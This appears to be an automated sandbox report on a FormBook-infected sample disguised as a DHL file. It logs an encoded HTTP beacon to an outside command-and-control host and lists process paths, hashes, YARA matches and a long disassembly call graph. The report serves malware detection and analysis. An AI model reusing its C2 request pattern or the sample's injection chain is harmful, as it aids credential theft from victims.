                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.949998217.196.55.202804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:47:00.317390919 CET509OUTGET /fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0 HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.empowermedeco.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:47:01.524945974 CET1226INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:47:01 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:11:43:03
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Users\user\Desktop\DHL 30312052024.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DHL 30312052024.exe"
                                                                                      Imagebase:0xc00000
                                                                                      File size:1'208'832 bytes
                                                                                      MD5 hash:E414A371A1BE9843BA41AD3B33B1D734
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:11:43:07
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DHL 30312052024.exe"
                                                                                      Imagebase:0xa20000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:11:43:15
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe"
                                                                                      Imagebase:0xdd0000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:11:43:16
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                      Imagebase:0x670000
                                                                                      File size:22'016 bytes
                                                                                      MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:11:43:29
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe"
                                                                                      Imagebase:0xdd0000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:11:43:42
                                                                                      Start date:06/12/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff73feb0000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.4%
                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                        Signature Coverage:9.8%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:165
                                                                                        execution_graph 104566 c03633 104567 c0366a 104566->104567 104568 c036e7 104567->104568 104569 c03688 104567->104569 104570 c036e5 104567->104570 104574 c036ed 104568->104574 104575 c3d0cc 104568->104575 104571 c03695 104569->104571 104572 c0374b PostQuitMessage 104569->104572 104573 c036ca DefWindowProcW 104570->104573 104577 c036a0 104571->104577 104578 c3d154 104571->104578 104579 c036d8 104572->104579 104573->104579 104580 c036f2 104574->104580 104581 c03715 SetTimer RegisterWindowMessageW 104574->104581 104621 c11070 10 API calls Mailbox 104575->104621 104583 c03755 104577->104583 104584 c036a8 104577->104584 104637 c62527 71 API calls _memset 104578->104637 104587 c036f9 KillTimer 104580->104587 104588 c3d06f 104580->104588 104581->104579 104585 c0373e CreatePopupMenu 104581->104585 104582 c3d0f3 104622 c11093 331 API calls Mailbox 104582->104622 104611 c044a0 104583->104611 104590 c036b3 104584->104590 104591 c3d139 104584->104591 104585->104579 104618 c0443a Shell_NotifyIconW _memset 104587->104618 104594 c3d074 104588->104594 104595 c3d0a8 MoveWindow 104588->104595 104597 c036be 104590->104597 104598 c3d124 104590->104598 104591->104573 104636 c57c36 59 API calls Mailbox 104591->104636 104592 c3d166 104592->104573 104592->104579 104599 c3d097 SetFocus 104594->104599 104600 c3d078 104594->104600 104595->104579 104597->104573 104623 c0443a Shell_NotifyIconW _memset 104597->104623 104635 c62d36 81 API calls _memset 104598->104635 104599->104579 104600->104597 104604 c3d081 104600->104604 104601 c0370c 104619 c03114 DeleteObject DestroyWindow Mailbox 104601->104619 104620 c11070 10 API calls Mailbox 104604->104620 104607 c3d134 104607->104579 104609 c3d118 104624 c0434a 104609->104624 104612 c044b7 _memset 104611->104612 104613 c04539 104611->104613 104638 c0407c 104612->104638 104613->104579 104615 c04522 KillTimer SetTimer 104615->104613 104616 c3d4ab Shell_NotifyIconW 104616->104615 104617 c044de 104617->104615 104617->104616 104618->104601 104619->104579 104620->104579 104621->104582 104622->104597 104623->104609 104625 c04375 _memset 104624->104625 104757 c04182 104625->104757 104629 c04430 Shell_NotifyIconW 104632 c04422 104629->104632 104630 c04414 Shell_NotifyIconW 104630->104632 104631 c043fa 104631->104629 104631->104630 104633 c0407c 61 API calls 104632->104633 104634 c04429 104633->104634 104634->104570 104635->104607 104636->104570 104637->104592 104639 c04098 104638->104639 104640 c0416f Mailbox 104638->104640 104660 c07a16 104639->104660 104640->104617 104643 c040b3 104665 c07bcc 104643->104665 104644 c3d3c8 LoadStringW 104647 c3d3e2 104644->104647 104646 c040c8 104646->104647 104648 c040d9 104646->104648 104649 c07b2e 59 API calls 104647->104649 104650 c040e3 104648->104650 104651 c04174 104648->104651 104654 c3d3ec 104649->104654 104674 c07b2e 104650->104674 104683 c08047 104651->104683 104657 c040ed _memset _wcscpy 104654->104657 104687 c07cab 104654->104687 104656 c3d40e 104659 c07cab 59 API calls 104656->104659 104658 c04155 Shell_NotifyIconW 104657->104658 104658->104640 104659->104657 104694 c20db6 104660->104694 104662 c07a3b 104704 c08029 104662->104704 104666 c07c45 104665->104666 104667 c07bd8 __wsetenvp 104665->104667 104736 c07d2c 104666->104736 104669 c07c13 104667->104669 104670 c07bee 104667->104670 104671 c08029 59 API calls 104669->104671 104735 c07f27 59 API calls Mailbox 104670->104735 104673 c07bf6 _memmove 104671->104673 104673->104646 104675 c07b40 104674->104675 104676 c3ec6b 104674->104676 104744 c07a51 104675->104744 104750 c57bdb 59 API calls _memmove 104676->104750 104679 c07b4c 104679->104657 104680 c3ec75 104681 c08047 59 API calls 104680->104681 104682 c3ec7d Mailbox 104681->104682 104684 c08052 104683->104684 104685 c0805a 104683->104685 104751 c07f77 59 API calls 2 library calls 104684->104751 104685->104657 104688 c3ed4a 104687->104688 104689 c07cbf 104687->104689 104691 c08029 59 API calls 104688->104691 104752 c07c50 104689->104752 104693 c3ed55 __wsetenvp _memmove 104691->104693 104692 c07cca 104692->104656 104695 c20dbe 104694->104695 104697 c20dd8 104695->104697 104699 c20ddc std::exception::exception 104695->104699 104707 c2571c 104695->104707 104724 c233a1 DecodePointer 104695->104724 104697->104662 104725 c2859b RaiseException 104699->104725 104701 c20e06 104726 c284d1 58 API calls _free 104701->104726 104703 c20e18 104703->104662 104705 c20db6 Mailbox 59 API calls 104704->104705 104706 c040a6 104705->104706 104706->104643 104706->104644 104708 c25797 104707->104708 104718 c25728 104707->104718 104733 c233a1 DecodePointer 104708->104733 104710 c2579d 104734 c28b28 58 API calls __getptd_noexit 104710->104734 104713 c2575b RtlAllocateHeap 104714 c2578f 104713->104714 104713->104718 104714->104695 104716 c25733 104716->104718 104727 c2a16b 58 API calls __NMSG_WRITE 104716->104727 104728 c2a1c8 58 API calls 7 library calls 104716->104728 104729 c2309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104716->104729 104717 c25783 104731 c28b28 58 API calls __getptd_noexit 104717->104731 104718->104713 104718->104716 104718->104717 104722 c25781 104718->104722 104730 c233a1 DecodePointer 104718->104730 104732 c28b28 58 API calls __getptd_noexit 104722->104732 104724->104695 104725->104701 104726->104703 104727->104716 104728->104716 104730->104718 104731->104722 104732->104714 104733->104710 104734->104714 104735->104673 104737 c07d43 _memmove 104736->104737 104738 c07d3a 104736->104738 104737->104673 104738->104737 104740 c07e4f 104738->104740 104741 c07e62 104740->104741 104743 c07e5f _memmove 104740->104743 104742 c20db6 Mailbox 59 API calls 104741->104742 104742->104743 104743->104737 104745 c07a5f 104744->104745 104746 c07a85 _memmove 104744->104746 104745->104746 104747 c20db6 Mailbox 59 API calls 104745->104747 104746->104679 104748 c07ad4 104747->104748 104749 c20db6 Mailbox 59 API calls 104748->104749 104749->104746 104750->104680 104751->104685 104753 c07c5f __wsetenvp 104752->104753 104754 c08029 59 API calls 104753->104754 104755 c07c70 _memmove 104753->104755 104756 c3ed07 _memmove 104754->104756 104755->104692 104758 c3d423 104757->104758 104759 c04196 104757->104759 104758->104759 104760 c3d42c DestroyIcon 104758->104760 104759->104631 104761 c62f94 62 API calls _W_store_winword 104759->104761 104760->104759 104761->104631 104762 c27c56 104763 c27c62 __wsopen_helper 104762->104763 104799 c29e08 GetStartupInfoW 104763->104799 104765 c27c67 104801 c28b7c GetProcessHeap 104765->104801 104767 c27cbf 104768 c27cca 104767->104768 104884 c27da6 58 API calls 3 library calls 104767->104884 104802 c29ae6 104768->104802 104771 c27cd0 104772 c27cdb __RTC_Initialize 104771->104772 104885 c27da6 58 API calls 3 library calls 104771->104885 104823 c2d5d2 104772->104823 104775 c27cea 104776 c27cf6 GetCommandLineW 104775->104776 104886 c27da6 58 API calls 3 library calls 104775->104886 104842 c34f23 GetEnvironmentStringsW 104776->104842 104779 c27cf5 104779->104776 104782 c27d10 104783 c27d1b 104782->104783 104887 c230b5 58 API calls 3 library calls 104782->104887 104852 c34d58 104783->104852 104786 c27d21 104787 c27d2c 104786->104787 104888 c230b5 58 API calls 3 library calls 104786->104888 104866 c230ef 104787->104866 104790 c27d34 104791 c27d3f __wwincmdln 104790->104791 104889 c230b5 58 API calls 3 library calls 104790->104889 104872 c047d0 104791->104872 104794 c27d53 104795 c27d62 104794->104795 104890 c23358 58 API calls _doexit 104794->104890 104891 c230e0 58 API calls _doexit 104795->104891 104798 c27d67 __wsopen_helper 104800 c29e1e 104799->104800 104800->104765 104801->104767 104892 c23187 36 API calls 2 library calls 104802->104892 104804 c29aeb 104893 c29d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 104804->104893 104806 c29af0 104807 c29af4 104806->104807 104895 c29d8a TlsAlloc 104806->104895 104894 c29b5c 61 API calls 2 library calls 104807->104894 104810 c29af9 104810->104771 104811 c29b06 104811->104807 104812 c29b11 104811->104812 104896 c287d5 104812->104896 104815 c29b53 104904 c29b5c 61 API calls 2 library calls 104815->104904 104818 c29b58 104818->104771 104819 c29b32 104819->104815 104820 c29b38 104819->104820 104903 c29a33 58 API calls 4 library calls 104820->104903 104822 c29b40 GetCurrentThreadId 104822->104771 104824 c2d5de __wsopen_helper 104823->104824 104916 c29c0b 104824->104916 104826 c2d5e5 104827 c287d5 __calloc_crt 58 API calls 104826->104827 104828 c2d5f6 104827->104828 104829 c2d661 GetStartupInfoW 104828->104829 104832 c2d601 __wsopen_helper @_EH4_CallFilterFunc@8 104828->104832 104830 c2d676 104829->104830 104831 c2d7a5 104829->104831 104830->104831 104835 c287d5 __calloc_crt 58 API calls 104830->104835 104838 c2d6c4 104830->104838 104833 c2d86d 104831->104833 104836 c2d7f2 GetStdHandle 104831->104836 104837 c2d805 GetFileType 104831->104837 104924 c29e2b InitializeCriticalSectionAndSpinCount 104831->104924 104832->104775 104925 c2d87d LeaveCriticalSection _doexit 104833->104925 104835->104830 104836->104831 104837->104831 104838->104831 104839 c2d6f8 GetFileType 104838->104839 104923 c29e2b InitializeCriticalSectionAndSpinCount 104838->104923 104839->104838 104843 c27d06 104842->104843 104844 c34f34 104842->104844 104848 c34b1b GetModuleFileNameW 104843->104848 104965 c2881d 58 API calls __malloc_crt 104844->104965 104846 c34f5a _memmove 104847 c34f70 FreeEnvironmentStringsW 104846->104847 104847->104843 104849 c34b4f _wparse_cmdline 104848->104849 104851 c34b8f _wparse_cmdline 104849->104851 104966 c2881d 58 API calls __malloc_crt 104849->104966 104851->104782 104853 c34d71 __wsetenvp 104852->104853 104857 c34d69 104852->104857 104854 c287d5 __calloc_crt 58 API calls 104853->104854 104862 c34d9a __wsetenvp 104854->104862 104855 c34df1 104856 c22d55 _free 58 API calls 104855->104856 104856->104857 104857->104786 104858 c287d5 __calloc_crt 58 API calls 104858->104862 104859 c34e16 104861 c22d55 _free 58 API calls 104859->104861 104861->104857 104862->104855 104862->104857 104862->104858 104862->104859 104863 c34e2d 104862->104863 104967 c34607 58 API calls __beginthreadex 104862->104967 104968 c28dc6 IsProcessorFeaturePresent 104863->104968 104865 c34e39 104865->104786 104867 c230fb __IsNonwritableInCurrentImage 104866->104867 104991 c2a4d1 104867->104991 104869 c23119 __initterm_e 104871 c23138 _doexit __IsNonwritableInCurrentImage 104869->104871 104994 c22d40 104869->104994 104871->104790 104873 c047ea 104872->104873 104883 c04889 104872->104883 104874 c04824 IsThemeActive 104873->104874 105029 c2336c 104874->105029 104878 c04850 105041 c048fd SystemParametersInfoW SystemParametersInfoW 104878->105041 104880 c0485c 105042 c03b3a 104880->105042 104882 c04864 SystemParametersInfoW 104882->104883 104883->104794 104884->104768 104885->104772 104886->104779 104890->104795 104891->104798 104892->104804 104893->104806 104894->104810 104895->104811 104897 c287dc 104896->104897 104899 c28817 104897->104899 104901 c287fa 104897->104901 104905 c351f6 104897->104905 104899->104815 104902 c29de6 TlsSetValue 104899->104902 104901->104897 104901->104899 104913 c2a132 Sleep 104901->104913 104902->104819 104903->104822 104904->104818 104906 c35201 104905->104906 104911 c3521c 104905->104911 104907 c3520d 104906->104907 104906->104911 104914 c28b28 58 API calls __getptd_noexit 104907->104914 104909 c3522c HeapAlloc 104910 c35212 104909->104910 104909->104911 104910->104897 104911->104909 104911->104910 104915 c233a1 DecodePointer 104911->104915 104913->104901 104914->104910 104915->104911 104917 c29c2f EnterCriticalSection 104916->104917 104918 c29c1c 104916->104918 104917->104826 104926 c29c93 104918->104926 104920 c29c22 104920->104917 104950 c230b5 58 API calls 3 library calls 104920->104950 104923->104838 104924->104831 104925->104832 104927 c29c9f __wsopen_helper 104926->104927 104928 c29cc0 104927->104928 104929 c29ca8 104927->104929 104938 c29ce1 __wsopen_helper 104928->104938 104954 c2881d 58 API calls __malloc_crt 104928->104954 104951 c2a16b 58 API calls __NMSG_WRITE 104929->104951 104931 c29cad 104952 c2a1c8 58 API calls 7 library calls 104931->104952 104934 c29cd5 104936 c29ceb 104934->104936 104937 c29cdc 104934->104937 104935 c29cb4 104953 c2309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104935->104953 104939 c29c0b __lock 58 API calls 104936->104939 104955 c28b28 58 API calls __getptd_noexit 104937->104955 104938->104920 104942 c29cf2 104939->104942 104944 c29d17 104942->104944 104945 c29cff 104942->104945 104957 c22d55 104944->104957 104956 c29e2b InitializeCriticalSectionAndSpinCount 104945->104956 104948 c29d0b 104963 c29d33 LeaveCriticalSection _doexit 104948->104963 104951->104931 104952->104935 104954->104934 104955->104938 104956->104948 104958 c22d87 __dosmaperr 104957->104958 104959 c22d5e RtlFreeHeap 104957->104959 104958->104948 104959->104958 104960 c22d73 104959->104960 104964 c28b28 58 API calls __getptd_noexit 104960->104964 104962 c22d79 GetLastError 104962->104958 104963->104938 104964->104962 104965->104846 104966->104851 104967->104862 104969 c28dd1 104968->104969 104974 c28c59 104969->104974 104973 c28dec 104973->104865 104975 c28c73 _memset __call_reportfault 104974->104975 104976 c28c93 IsDebuggerPresent 104975->104976 104982 c2a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104976->104982 104978 c28d57 __call_reportfault 104983 c2c5f6 104978->104983 104980 c28d7a 104981 c2a140 GetCurrentProcess TerminateProcess 104980->104981 104981->104973 104982->104978 104984 c2c600 IsProcessorFeaturePresent 104983->104984 104985 c2c5fe 104983->104985 104987 c3590a 104984->104987 104985->104980 104990 c358b9 5 API calls 2 library calls 104987->104990 104989 c359ed 104989->104980 104990->104989 104992 c2a4d4 EncodePointer 104991->104992 104992->104992 104993 c2a4ee 104992->104993 104993->104869 104997 c22c44 104994->104997 104996 c22d4b 104996->104871 104998 c22c50 __wsopen_helper 104997->104998 105005 c23217 104998->105005 105004 c22c77 __wsopen_helper 105004->104996 105006 c29c0b __lock 58 API calls 105005->105006 105007 c22c59 105006->105007 105008 c22c88 DecodePointer DecodePointer 105007->105008 105009 c22c65 105008->105009 105010 c22cb5 105008->105010 105019 c22c82 105009->105019 105010->105009 105022 c287a4 59 API calls __beginthreadex 105010->105022 105012 c22d18 EncodePointer EncodePointer 105012->105009 105013 c22cec 105013->105009 105017 c22d06 EncodePointer 105013->105017 105024 c28864 61 API calls 2 library calls 105013->105024 105014 c22cc7 105014->105012 105014->105013 105023 c28864 61 API calls 2 library calls 105014->105023 105017->105012 105018 c22d00 105018->105009 105018->105017 105025 c23220 105019->105025 105022->105014 105023->105013 105024->105018 105028 c29d75 LeaveCriticalSection 105025->105028 105027 c22c87 105027->105004 105028->105027 105030 c29c0b __lock 58 API calls 105029->105030 105031 c23377 DecodePointer EncodePointer 105030->105031 105094 c29d75 LeaveCriticalSection 105031->105094 105033 c04849 105034 c233d4 105033->105034 105035 c233f8 105034->105035 105036 c233de 105034->105036 105035->104878 105036->105035 105095 c28b28 58 API calls __getptd_noexit 105036->105095 105038 c233e8 105096 c28db6 9 API calls __beginthreadex 105038->105096 105040 c233f3 105040->104878 105041->104880 105043 c03b47 __write_nolock 105042->105043 105097 c07667 105043->105097 105047 c03b7a IsDebuggerPresent 105048 c3d272 MessageBoxA 105047->105048 105049 c03b88 105047->105049 105052 c3d28c 105048->105052 105050 c03c61 105049->105050 105049->105052 105053 c03ba5 105049->105053 105051 c03c68 SetCurrentDirectoryW 105050->105051 105056 c03c75 Mailbox 105051->105056 105301 c07213 59 API calls Mailbox 105052->105301 105183 c07285 105053->105183 105056->104882 105057 c3d29c 105062 c3d2b2 SetCurrentDirectoryW 105057->105062 105059 c03bc3 GetFullPathNameW 105060 c07bcc 59 API calls 105059->105060 105061 c03bfe 105060->105061 105199 c1092d 105061->105199 105062->105056 105065 c03c1c 105066 c03c26 105065->105066 105302 c5874b AllocateAndInitializeSid CheckTokenMembership FreeSid 105065->105302 105215 c03a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 105066->105215 105069 c3d2cf 105069->105066 105073 c3d2e0 105069->105073 105072 c03c30 105074 c03c43 105072->105074 105077 c0434a 68 API calls 105072->105077 105303 c04706 105073->105303 105223 c109d0 105074->105223 105076 c3d2e8 105310 c07de1 105076->105310 105077->105074 105080 c03c4e 105080->105050 105300 c0443a Shell_NotifyIconW _memset 105080->105300 105081 c3d2f5 105082 c3d324 105081->105082 105083 c3d2ff 105081->105083 105086 c07cab 59 API calls 105082->105086 105085 c07cab 59 API calls 105083->105085 105087 c3d30a 105085->105087 105088 c3d320 GetForegroundWindow ShellExecuteW 105086->105088 105089 c07b2e 59 API calls 105087->105089 105092 c3d354 Mailbox 105088->105092 105091 c3d317 105089->105091 105093 c07cab 59 API calls 105091->105093 105092->105050 105093->105088 105094->105033 105095->105038 105096->105040 105098 c20db6 Mailbox 59 API calls 105097->105098 105099 c07688 105098->105099 105100 c20db6 Mailbox 59 API calls 105099->105100 105101 c03b51 GetCurrentDirectoryW 105100->105101 105102 c03766 105101->105102 105103 c07667 59 API calls 105102->105103 105104 c0377c 105103->105104 105314 c03d31 105104->105314 105106 c0379a 105107 c04706 61 API calls 105106->105107 105108 c037ae 105107->105108 105109 c07de1 59 API calls 105108->105109 105110 c037bb 105109->105110 105328 c04ddd 105110->105328 105113 c3d173 105395 c6955b 105113->105395 105114 c037dc Mailbox 105117 c08047 59 API calls 105114->105117 105120 c037ef 105117->105120 105118 c3d192 105119 c22d55 _free 58 API calls 105118->105119 105122 c3d19f 105119->105122 105352 c0928a 105120->105352 105124 c04e4a 84 API calls 105122->105124 105126 c3d1a8 105124->105126 105130 c03ed0 